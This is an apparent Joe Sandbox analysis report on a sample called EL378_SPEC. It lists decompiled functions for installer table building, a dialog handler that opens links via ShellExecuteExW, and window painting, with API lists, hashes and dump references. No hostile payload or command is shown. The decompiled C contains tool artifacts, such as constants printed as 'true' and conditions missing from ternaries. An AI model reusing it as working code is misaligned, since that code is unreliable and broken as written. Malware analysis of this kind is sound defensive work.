Opcode Fuzzy Hash: 9a6e5cab2d0bf7698bdae054db21990c31fcebd81f7c740a7b631921d0cd6e3b
Instruction Fuzzy Hash: 09F17171A183418FCB04CF18C49076ABBE5FF89315F14896EE889EB286D778E941CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00406EAE Relevance: .3, Instructions: 313
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00406EAE(char _a1, short _a2, signed int _a4, signed int _a8, signed int _a12, signed int _a16, void* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, void _a60, signed int _a124, signed int _a128, signed int _a188, signed int* _a252, intOrPtr _a256, intOrPtr _a260, intOrPtr _a264, intOrPtr _a268, intOrPtr* _a272, signed int* _a276, intOrPtr _a280, signed int* _a284) {
				signed char _v0;
				signed int _t170;
				void* _t172;
				signed int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t179;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				intOrPtr* _t201;
				signed int _t202;
				short _t207;
				signed int _t214;
				signed char _t225;
				signed int _t231;
				signed int* _t234;
				signed int _t236;
				signed int _t237;
				signed int* _t239;
				signed int _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed char _t248;
				intOrPtr _t250;
				signed int _t251;
				signed int _t257;
				signed int _t259;
				intOrPtr _t261;
				intOrPtr _t262;
				signed int _t263;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int _t269;
				signed int _t271;
				signed int _t273;
				signed int _t276;
				void* _t277;
				void* _t278;
				signed int _t280;
				signed int _t281;
				signed int* _t284;
				signed int _t287;
				void* _t288;
				intOrPtr _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				intOrPtr _t294;
				signed int _t296;
				intOrPtr _t297;
				signed int _t298;
				void* _t301;
				signed int _t305;
				void* _t306;
				void* _t307;

				_t234 = _a252;
				_t294 = _a256;
				_t262 = _t294;
				_push("true");
				_pop(_t237);
				memset( &_a60, 0, _t237 << 2);
				_t307 = _t306 + 0xc;
				_t239 = _t234;
				do {
					_t170 =  *_t239;
					_t239 =  &(_t239[1]);
					 *((intOrPtr*)(_t307 + 0x4c + _t170 * 4)) =  *((intOrPtr*)(_t307 + 0x4c + _t170 * 4)) + 1;
					_t262 = _t262 - 1;
				} while (_t262 != 0);
				if(_a60 != _t294) {
					_t284 = _a276;
					_t241 = 1;
					_t291 = 0;
					_t263 = 0xf;
					while( *((intOrPtr*)(_t307 + 0x4c + _t241 * 4)) == _t291) {
						_t241 = _t241 + 1;
						if(_t241 <= _t263) {
							continue;
						}
						break;
					}
					_a28 = _t241;
					_t172 =  >=  ?  *_t284 : _t241;
					while( *((intOrPtr*)(_t307 + 0x4c + _t263 * 4)) == _t291) {
						_t263 = _t263 - 1;
						if(_t263 != 0) {
							continue;
						}
						break;
					}
					_a32 = _t263;
					_t296 =  <=  ? _t172 : _t263;
					_t173 = _t296;
					_a12 = _t296;
					_t297 = _a256;
					 *_t284 = _t173;
					_t287 = 1 << _t241;
					while(_t241 < _t263) {
						_t288 = _t287 -  *((intOrPtr*)(_t307 + 0x4c + _t241 * 4));
						if(_t288 < 0) {
							L61:
							_t174 = _t173 | 0xffffffff;
							L62:
							return _t174;
						}
						_t241 = _t241 + 1;
						_t287 = _t288 + _t288;
					}
					_t243 = _t263 << 2;
					_a36 = _t243;
					_t173 =  *(_t307 + _t243 + 0x4c);
					_t289 = _t287 - _t173;
					_a56 = _t289;
					if(_t289 < 0) {
						goto L61;
					}
					_a128 = _t291;
					 *(_t307 + _t243 + 0x4c) = _t173 + _t289;
					_t244 = _t291;
					_t264 = _t263 - 1;
					if(_t264 == 0) {
						L18:
						_t245 = _t291;
						do {
							_t265 =  *_t234;
							_t234 =  &(_t234[1]);
							if(_t265 != 0) {
								_t176 =  *(_t307 + 0x8c + _t265 * 4);
								 *(0x4330a0 + _t176 * 4) = _t245;
								 *(_t307 + 0x8c + _t265 * 4) = _t176 + 1;
							}
							_t245 = _t245 + 1;
						} while (_t245 < _t297);
						_t298 = _t291;
						_t246 = _a12;
						_t266 = _a28;
						_t236 =  ~_t246;
						_a16 = _t298;
						_t179 =  *(_t307 + _a36 + 0x8c);
						_a52 = _t179;
						_t174 = _t179 | 0xffffffff;
						_a124 = _t291;
						_a20 = 0x4330a0;
						_a4 = _t174;
						_a188 = _t291;
						_a24 = _t291;
						_a40 = _t291;
						if(_t266 > _a32) {
							L58:
							if(_t289 == 0 || _a32 == 1) {
								_t174 = _t291;
							}
							goto L62;
						}
						_t181 =  &_a60 + _t266 * 4;
						_a44 = _t181;
						do {
							_t182 =  *_t181;
							while(_t182 != 0) {
								_a48 = _t182;
								_a36 = _t182 - 1;
								_t173 = _t246 + _t236;
								while(1) {
									_a8 = _t173;
									if(_t266 <= _t173) {
										break;
									}
									_a4 = _a4 + 1;
									_t301 =  >  ? _t246 : _a32 - _t173;
									_t248 = _t266 - _t173;
									_t269 = 1 << _t248;
									if(1 <= _a48) {
										L31:
										_a40 = 1;
										_t271 =  *_a284;
										_t305 = (1 << _t248) + _t271;
										if(1 > 0x5a0) {
											goto L61;
										}
										_a24 = _a280 + _t271 * 4;
										_t273 = _a4;
										 *((intOrPtr*)(_t307 + 0xcc + _t273 * 4)) = _a24;
										 *_a284 = _t305;
										_t187 = _a8;
										_t298 = _a16;
										if(_t273 == 0) {
											 *_a272 = _a24;
										} else {
											_a1 = _a12;
											_v0 = _t248;
											 *(_t307 + 0x8c + _t273 * 4) = _t298;
											_t276 = _t298 >> _t236;
											_t261 =  *((intOrPtr*)(_t307 + 0xc8 + _a4 * 4));
											_a2 = (_a24 - _t261 >> 2) - _t276;
											 *(_t261 + _t276 * 4) = _v0;
											_t187 = _a8;
										}
										_t246 = _a12;
										_t236 = _t187;
										_t266 = _a28;
										_t173 = _t187 + _t246;
										continue;
									}
									_t277 = _t269 + (_t173 | 0xffffffff) - _a36;
									_t173 = _a44;
									if(_t248 >= _t301) {
										goto L31;
									} else {
										goto L28;
									}
									while(1) {
										L28:
										_t248 = _t248 + 1;
										if(_t248 >= _t301) {
											goto L31;
										}
										_t278 = _t277 + _t277;
										_t173 = _t173 + 4;
										if(_t278 <=  *_t173) {
											goto L31;
										}
										_t277 = _t278 -  *_t173;
									}
									goto L31;
								}
								_a1 = _t266 - _t236;
								if(_a20 < 0x4330a0 + _a52 * 4) {
									_t201 = _a20;
									_t250 =  *_t201;
									_t202 = _t201 + 4;
									_a16 = _t202;
									if(_t250 >= _a260) {
										_t251 = _t250 - _a260;
										_v0 =  *((intOrPtr*)(_a268 + _t251 * 2)) + 0x50;
										_t207 =  *((intOrPtr*)(_a264 + _t251 * 2));
									} else {
										_v0 = (_t202 & 0xffffff00 | _t250 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t207 =  *_a20;
									}
									_a2 = _t207;
									_a20 = _a16;
								} else {
									_v0 = 0xc0;
								}
								_a48 = 1 << _t266 - _t236;
								_t280 = _t298 >> _t236;
								if(_t280 >= _a40) {
									L47:
									_t266 = _a28;
									_t214 = 1 << _t266 - 1;
									while((_t298 & _t214) != 0) {
										_t298 = _t298 ^ _t214;
										_t214 = _t214 >> 1;
									}
									_t298 = _t298 ^ _t214;
									_a16 = _t298;
									_t257 = _a4;
									if(((1 << _t236) - 0x00000001 & _t298) ==  *((intOrPtr*)(_t307 + 0x8c + _t257 * 4))) {
										L54:
										_t182 = _a36;
										_t246 = _a12;
										continue;
									}
									_t281 = _a12;
									_t292 = _t257;
									do {
										_t236 = _t236 - _t281;
										_t292 = _t292 - 1;
									} while (((1 << _t236) - 0x00000001 & _t298) !=  *((intOrPtr*)(_t307 + 0x8c + _t292 * 4)));
									_t266 = _a28;
									_a4 = _t292;
									_t291 = 0;
									goto L54;
								} else {
									_t225 = _v0;
									_t259 = _a48;
									_t290 = _a24;
									do {
										 *(_t290 + _t280 * 4) = _t225;
										_t280 = _t280 + _t259;
									} while (_t280 < _a40);
									_t289 = _a56;
									_t291 = 0;
									goto L47;
								}
							}
							_t266 = _t266 + 1;
							_t181 = _a44 + 4;
							_a28 = _t266;
							_a44 = _t181;
						} while (_t266 <= _a32);
						_t174 = _t181 | 0xffffffff;
						goto L58;
					}
					_t231 = _t291;
					do {
						_t244 = _t244 +  *((intOrPtr*)(_t307 + _t231 + 0x50));
						_t231 = _t231 + 4;
						 *(_t307 + _t231 + 0x90) = _t244;
						_t264 = _t264 - 1;
					} while (_t264 != 0);
					goto L18;
				}
				 *_a272 = 0;
				 *_a276 = 0;
				_t174 = 0;
				goto L62;
			}

0x00406eb1
0x00406eb9
0x00406ec0
0x00406ec4
0x00406ec6
0x00406ecb
0x00406ecb
0x00406ecd
0x00406ecf
0x00406ecf
0x00406ed1
0x00406ed4
0x00406ed8
0x00406ed8
0x00406ee1
0x00406efe
0x00406f09
0x00406f0a
0x00406f0c
0x00406f0d
0x00406f13
0x00406f16
0x00000000
0x00000000
0x00000000
0x00406f16
0x00406f1c
0x00406f20
0x00406f23
0x00406f29
0x00406f2c
0x00000000
0x00000000
0x00000000
0x00406f2c
0x00406f30
0x00406f36
0x00406f39
0x00406f3b
0x00406f3f
0x00406f46
0x00406f4b
0x00406f5c
0x00406f4f
0x00406f53
0x0040727e
0x0040727e
0x00407285
0x0040728b
0x0040728b
0x00406f59
0x00406f5a
0x00406f5a
0x00406f62
0x00406f65
0x00406f69
0x00406f6d
0x00406f6f
0x00406f73
0x00000000
0x00000000
0x00406f7b
0x00406f82
0x00406f86
0x00406f88
0x00406f8b
0x00406fa2
0x00406fa2
0x00406fa4
0x00406fa4
0x00406fa6
0x00406fab
0x00406fad
0x00406fb4
0x00406fbc
0x00406fbc
0x00406fc3
0x00406fc4
0x00406fcc
0x00406fce
0x00406fd4
0x00406fd8
0x00406fda
0x00406fde
0x00406fe5
0x00406fe9
0x00406fec
0x00406ff3
0x00406ffb
0x00406fff
0x00407006
0x0040700a
0x00407012
0x0040726f
0x00407271
0x0040727a
0x0040727a
0x00000000
0x00407271
0x0040701c
0x0040701f
0x00407023
0x00407023
0x0040724a
0x0040702a
0x0040702f
0x00407033
0x00407128
0x00407128
0x0040712e
0x00000000
0x00000000
0x0040703f
0x00407047
0x0040704e
0x00407051
0x00407057
0x0040707c
0x00407088
0x0040708c
0x0040708e
0x00407096
0x00000000
0x00000000
0x004070a6
0x004070aa
0x004070b2
0x004070c0
0x004070c2
0x004070c6
0x004070cc
0x0040711a
0x004070ce
0x004070d2
0x004070da
0x004070e0
0x004070e9
0x004070eb
0x004070fd
0x00407106
0x00407109
0x00407109
0x0040711c
0x00407120
0x00407122
0x00407126
0x00000000
0x00407126
0x00407060
0x00407062
0x00407068
0x00000000
0x00000000
0x00000000
0x00000000
0x0040706a
0x0040706a
0x0040706a
0x0040706d
0x00000000
0x00000000
0x0040706f
0x00407071
0x00407076
0x00000000
0x00000000
0x00407078
0x00407078
0x00000000
0x0040706a
0x00407138
0x0040714b
0x00407154
0x00407158
0x0040715a
0x0040715d
0x00407168
0x00407184
0x00407197
0x004071a2
0x0040716a
0x00407177
0x0040717f
0x0040717f
0x004071a6
0x004071af
0x0040714d
0x0040714d
0x0040714d
0x004071c0
0x004071c4
0x004071ca
0x004071e9
0x004071e9
0x004071f3
0x004071fb
0x004071f7
0x004071f9
0x004071f9
0x004071ff
0x00407205
0x0040720c
0x0040721a
0x00407242
0x00407242
0x00407246
0x00000000
0x00407246
0x0040721c
0x00407220
0x00407222
0x00407224
0x0040722b
0x0040722f
0x00407238
0x0040723c
0x00407240
0x00000000
0x004071cc
0x004071cc
0x004071d0
0x004071d4
0x004071d8
0x004071d8
0x004071db
0x004071dd
0x004071e3
0x004071e7
0x00000000
0x004071e7
0x004071ca
0x00407256
0x00407257
0x0040725a
0x0040725e
0x00407262
0x0040726c
0x00000000
0x0040726c
0x00406f8d
0x00406f8f
0x00406f8f
0x00406f93
0x00406f96
0x00406f9d
0x00406f9d
0x00000000
0x00406f8f
0x00406eec
0x00406ef5
0x00406ef7
0x00000000

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d4264db5c1cea3561c37235cc14e2777cb8cb696d127ee99180335f49e594da
Instruction ID: 3960b1f74d0eeaa1242e3296eaed654cae4ca589e29bf15b92dbc6edc15467d5
Opcode Fuzzy Hash: 4d4264db5c1cea3561c37235cc14e2777cb8cb696d127ee99180335f49e594da
Instruction Fuzzy Hash: 07C16671A0C3458FC718DF28D580A6ABBE1BBC9304F148A3EE59997380D734E916CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00403D8A Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 221
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403D8A() {
				struct HWND__* _t60;
				intOrPtr _t61;
				unsigned int _t66;
				signed short* _t88;
				unsigned int _t89;
				long _t104;
				intOrPtr _t117;
				intOrPtr _t118;
				int _t120;
				signed int _t121;
				struct HWND__* _t125;
				int _t126;
				int _t132;
				intOrPtr _t135;
				struct HWND__* _t137;
				struct HWND__* _t138;
				int _t139;
				void* _t142;

				if( *((intOrPtr*)(_t142 + 0x50)) != 0x110) {
					_t139 =  *(_t142 + 0x68);
					if( *(_t142 + 0x60) != 0x111) {
						if( *(_t142 + 0x60) != 0x4e) {
							if( *(_t142 + 0x60) == 0x40b) {
								 *0x42dd5c =  *0x42dd5c + 1;
							}
							L25:
							return E0040575B( *(_t142 + 0x68),  *(_t142 + 0x68), _t139);
						}
						_t60 = GetDlgItem( *(_t142 + 0x60), 0x3e8);
						_t117 =  *((intOrPtr*)(_t139 + 8));
						_t125 = _t60;
						if(_t117 != 0x70b) {
							L16:
							if(_t117 != 0x700 ||  *((intOrPtr*)(_t139 + 0xc)) != 0x100) {
								goto L25;
							} else {
								_t61 =  *((intOrPtr*)(_t139 + 0x10));
								if(_t61 == 0xd) {
									SendMessageW( *0x4349f8, 0x111, "true", 0);
									_t61 =  *((intOrPtr*)(_t139 + 0x10));
								}
								if(_t61 == 0x1b) {
									SendMessageW( *0x4349f8, "true", 0, 0);
								}
								return 1;
							}
						}
						if( *((intOrPtr*)(_t139 + 0xc)) != 0x201) {
							goto L25;
						}
						_t66 =  *(_t139 + 0x1c);
						_t118 =  *((intOrPtr*)(_t139 + 0x18));
						 *(_t142 + 0x14) = _t66;
						 *(_t142 + 0x10) = _t118;
						 *(_t142 + 0x18) = 0x4339a0;
						if(_t66 - _t118 >= 0x800) {
							goto L25;
						}
						SendMessageW(_t125, 0x44b, 0, _t142 + 0x10);
						SetCursor(LoadCursorW(0, 0x7f02));
						 *((intOrPtr*)(_t142 + 0x24)) =  *((intOrPtr*)(_t142 + 0x5c));
						 *(_t142 + 0x2c) =  *(_t142 + 0x18);
						 *((intOrPtr*)(_t142 + 0x24)) = 0x500;
						 *((intOrPtr*)(_t142 + 0x3c)) = 1;
						 *(_t142 + 0x2c) = L"open";
						 *((intOrPtr*)(_t142 + 0x34)) = 0;
						 *((intOrPtr*)(_t142 + 0x38)) = 0;
						E004069F3(_t142 + 0x1c);
						SetCursor(LoadCursorW(0, 0x7f00));
						_t117 =  *((intOrPtr*)(_t139 + 8));
						goto L16;
					}
					if( *(_t142 + 0x64) >> 0x10 == 0 &&  *0x42dd5c == 0) {
						_t135 =  *0x42dd4c;
						if(( *(_t135 + 0x14) & 0x00000020) != 0) {
							_t120 = SendMessageW(GetDlgItem( *(_t142 + 0x6c), 0x40a), "true", 0, 0) & 0x00000001;
							 *(_t135 + 0x14) =  *(_t135 + 0x14) & 0xfffffffe | _t120;
							EnableWindow( *0x42dd54, _t120);
							E0040553C();
						}
					}
					goto L25;
				} else {
					_t126 =  *(_t142 + 0x68);
					_t121 =  *(_t126 + 0x30);
					if(_t121 < 0) {
						_t121 =  *( *0x4349e0 - 4 + _t121 * 4);
					}
					_push( *((intOrPtr*)(_t126 + 0x34)));
					_t88 =  *0x435a38 + _t121 * 2;
					_t89 =  &(_t88[1]);
					 *(_t142 + 0x64) = _t89;
					 *(_t142 + 0x14) = _t89;
					_t91 =  ==  ? E0040568C : E00405655;
					 *(_t142 + 0x68) =  *_t88 & 0x0000ffff;
					_t137 =  *(_t142 + 0x60);
					 *(_t142 + 0x18) = 0;
					_push(0x22);
					 *((intOrPtr*)(_t142 + 0x24)) =  ==  ? E0040568C : E00405655;
					_t132 = ( !( *(_t126 + 0x14) >> 5) |  *(_t126 + 0x14)) & 1;
					E0040551A(_t137);
					_push( *((intOrPtr*)( *(_t142 + 0x68) + 0x38)));
					_push(0x23);
					E0040551A(_t137);
					CheckDlgButton(_t137, (_t132 ^ 1) + 0x40a, 1);
					EnableWindow( *0x42dd54, _t132);
					_t138 = GetDlgItem(_t137, 0x3e8);
					E00405503(_t138);
					SendMessageW(_t138, 0x45b, 1, 0);
					_t104 =  *( *0x435a10 + 0x68);
					if(_t104 < 0) {
						_t104 = GetSysColor( ~_t104);
					}
					SendMessageW(_t138, 0x443, 0, _t104);
					SendMessageW(_t138, 0x445, 0, 0x4010000);
					SendMessageW(_t138, 0x435, 0, lstrlenW( *(_t142 + 0x60)));
					 *0x42dd5c = 0;
					SendMessageW(_t138, 0x449,  *(_t142 + 0x68), _t142 + 0x10);
					 *0x42dd5c = 0;
					return 0;
				}
			}

0x00403d99
0x00403ecc
0x00403ed0
0x00403f4a
0x00404065
0x00404067
0x00404067
0x0040406d
0x00000000
0x00404076
0x00403f59
0x00403f5f
0x00403f64
0x00403f6c
0x00404013
0x00404019
0x00000000
0x00404024
0x00404024
0x0040402a
0x0040403a
0x00404040
0x00404040
0x00404046
0x00404052
0x00404052
0x00000000
0x0040405a
0x00404019
0x00403f79
0x00000000
0x00000000
0x00403f7f
0x00403f82
0x00403f85
0x00403f8b
0x00403f8f
0x00403f9c
0x00000000
0x00000000
0x00403fae
0x00403fc9
0x00403fcf
0x00403fd7
0x00403fe0
0x00403fe8
0x00403ff0
0x00403ff8
0x00403ffc
0x00404000
0x0040400e
0x00404010
0x00000000
0x00404010
0x00403edc
0x00403eef
0x00403ef9
0x00403f23
0x00403f32
0x00403f35
0x00403f3b
0x00403f3b
0x00403ef9
0x00000000
0x00403d9f
0x00403d9f
0x00403da3
0x00403da8
0x00403db9
0x00403db9
0x00403dca
0x00403dcd
0x00403dd3
0x00403dd6
0x00403ddd
0x00403de6
0x00403de9
0x00403ded
0x00403df9
0x00403e00
0x00403e03
0x00403e07
0x00403e09
0x00403e12
0x00403e15
0x00403e18
0x00403e29
0x00403e36
0x00403e48
0x00403e4b
0x00403e5e
0x00403e65
0x00403e6a
0x00403e6f
0x00403e6f
0x00403e7d
0x00403e8b
0x00403e9e
0x00403ea4
0x00403eb5
0x00403eb7
0x00000000
0x00403ebd

APIs

CheckDlgButton.USER32(?,?,00000001), ref: 00403E29
EnableWindow.USER32(?), ref: 00403E36
GetDlgItem.USER32(?,000003E8), ref: 00403E42
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E5E
GetSysColor.USER32(?), ref: 00403E6F
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E7D
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E8B
lstrlenW.KERNEL32(?), ref: 00403E91
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E9E
SendMessageW.USER32(00000000,00000449,?,?), ref: 00403EB5
GetDlgItem.USER32(?,0000040A), ref: 00403F11
SendMessageW.USER32(00000000), ref: 00403F18
EnableWindow.USER32(00000000), ref: 00403F35
GetDlgItem.USER32(0000004E,000003E8), ref: 00403F59
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403FAE
LoadCursorW.USER32(00000000,00007F02), ref: 00403FC0
SetCursor.USER32(00000000), ref: 00403FC9

Part of subcall function 004069F3: ShellExecuteExW.SHELL32(?), ref: 00406A02

LoadCursorW.USER32(00000000,00007F00), ref: 0040400B
SetCursor.USER32(00000000), ref: 0040400E
SendMessageW.USER32(00000111,?,00000000), ref: 0040403A
SendMessageW.USER32(?,00000000,00000000), ref: 00404052

Strings

N, xrefs: 00403F45
Call, xrefs: 00403F8F

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N
API String ID: 3270077613-3438112850
Opcode ID: 728db8931e19c03b61cc67d759c3f4433907f5a55aac7dcf5e4c8ff3a598ca13
Instruction ID: c65a3a36bb4725451a4dfe1d630424e4f24f9f71ba4400fdcb13afcf6ca1fe0a
Opcode Fuzzy Hash: 728db8931e19c03b61cc67d759c3f4433907f5a55aac7dcf5e4c8ff3a598ca13
Instruction Fuzzy Hash: A3817DB0604305AFD710AF25DC84A6B7BA9FF84744F01493EF641B62A1C778AD45CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00401000() {
				struct HDC__* _t64;
				void* _t82;
				void* _t92;
				struct HDC__* _t100;
				struct tagRECT _t102;
				long _t110;
				struct HWND__* _t120;
				void* _t126;
				void* _t128;
				intOrPtr _t131;
				void* _t133;

				if( *((intOrPtr*)(_t133 + 0x64)) == 0xf) {
					_t131 =  *0x435a10;
					_t64 = BeginPaint( *(_t133 + 0x74), _t133 + 0x24);
					 *(_t133 + 0x10) =  *(_t133 + 0x10) & 0x00000000;
					_t100 = _t64;
					GetClientRect( *(_t133 + 0x74), _t133 + 0x1c);
					_t120 =  *(_t133 + 0x28);
					 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0x00000000;
					_t102 =  *(_t133 + 0x20);
					 *(_t133 + 0x74) = _t120;
					while(_t102 < _t120) {
						_t116 = _t120 - _t102;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						 *(_t133 + 0x18) = (((( *(_t131 + 0x56) & 0x000000ff) * _t102 + ( *(_t131 + 0x52) & 0x000000ff) * (_t120 - _t102)) / _t120 & 0x000000ff) << 0x00000008 | (( *(_t131 + 0x55) & 0x000000ff) *  *(_t133 + 0x20) + ( *(_t131 + 0x51) & 0x000000ff) * _t116) /  *(_t133 + 0x74) & 0x000000ff) << 0x00000008 | (( *(_t131 + 0x54) & 0x000000ff) *  *(_t133 + 0x20) + ( *(_t131 + 0x50) & 0x000000ff) * _t116) /  *(_t133 + 0x74) & 0x000000ff;
						_t82 = CreateBrushIndirect(_t133 + 0x10);
						 *(_t133 + 0x28) =  *(_t133 + 0x28) + 4;
						_t126 = _t82;
						FillRect(_t100, _t133 + 0x20, _t126);
						DeleteObject(_t126);
						_t120 =  *(_t133 + 0x74);
						_t102 =  *(_t133 + 0x20) + 4;
						 *(_t133 + 0x20) = _t102;
					}
					if( *(_t131 + 0x58) != 0xffffffff) {
						_t128 = CreateFontIndirectW( *(_t131 + 0x34));
						 *(_t133 + 0x74) = _t128;
						if(_t128 != 0) {
							 *(_t133 + 0x24) = 0x10;
							 *(_t133 + 0x28) = 8;
							SetBkMode(_t100, "true");
							SetTextColor(_t100,  *(_t131 + 0x58));
							_t92 = SelectObject(_t100, _t128);
							DrawTextW(_t100, 0x434a00, 0xffffffff, _t133 + 0x20, 0x820);
							SelectObject(_t100, _t92);
							DeleteObject( *(_t133 + 0x74));
						}
					}
					EndPaint( *(_t133 + 0x74), _t133 + 0x2c);
					return 0;
				}
				_t110 =  *(_t133 + 0x6c);
				if( *((intOrPtr*)(_t133 + 0x64)) == 0x46) {
					 *(_t110 + 0x18) =  *(_t110 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t110 + 4)) =  *0x4349f8;
				}
				return DefWindowProcW( *(_t133 + 0x6c),  *(_t133 + 0x6c),  *(_t133 + 0x6c), _t110);
			}

0x00401008
0x0040103b
0x0040104c
0x00401052
0x00401057
0x00401062
0x00401068
0x0040106c
0x00401071
0x00401075
0x0040110f
0x00401087
0x00401096
0x004010b1
0x004010cc
0x004010db
0x004010df
0x004010e5
0x004010ea
0x004010f3
0x004010fa
0x00401104
0x00401108
0x0040110b
0x0040110b
0x0040111b
0x00401126
0x00401128
0x0040112e
0x00401133
0x0040113b
0x00401143
0x0040114d
0x0040115b
0x00401171
0x00401179
0x0040117f
0x0040117f
0x0040112e
0x0040118e
0x00000000
0x00401199
0x0040100f
0x00401013
0x00401015
0x0040101e
0x0040101e
0x00000000

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
BeginPaint.USER32(?,?), ref: 0040104C
GetClientRect.USER32(?,?), ref: 00401062
CreateBrushIndirect.GDI32(00000000), ref: 004010DF
FillRect.USER32(00000000,?,00000000), ref: 004010F3
DeleteObject.GDI32(00000000), ref: 004010FA
CreateFontIndirectW.GDI32(?), ref: 00401120
SetBkMode.GDI32(00000000,?), ref: 00401143
SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
SelectObject.GDI32(00000000,00000000), ref: 0040115B
DrawTextW.USER32(00000000,00434A00,000000FF,?,00000820), ref: 00401171
SelectObject.GDI32(00000000,00000000), ref: 00401179
DeleteObject.GDI32(?), ref: 0040117F
EndPaint.USER32(?,?), ref: 0040118E

Strings

F, xrefs: 0040100A

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c6345d7c5fceae9535b237699f25ce67e7fd4968e8456bbccafdc44fed7c7a8a
Instruction ID: 3af209a9edb156689bef41e0a63d31b37659a4d6f6412c5d0cf3c0f243fc5647
Opcode Fuzzy Hash: c6345d7c5fceae9535b237699f25ce67e7fd4968e8456bbccafdc44fed7c7a8a
Instruction Fuzzy Hash: E041AFB20083509FC7159F65CD4496BBBE9FF88715F140A2EF995A22A1C734DD04CFA5

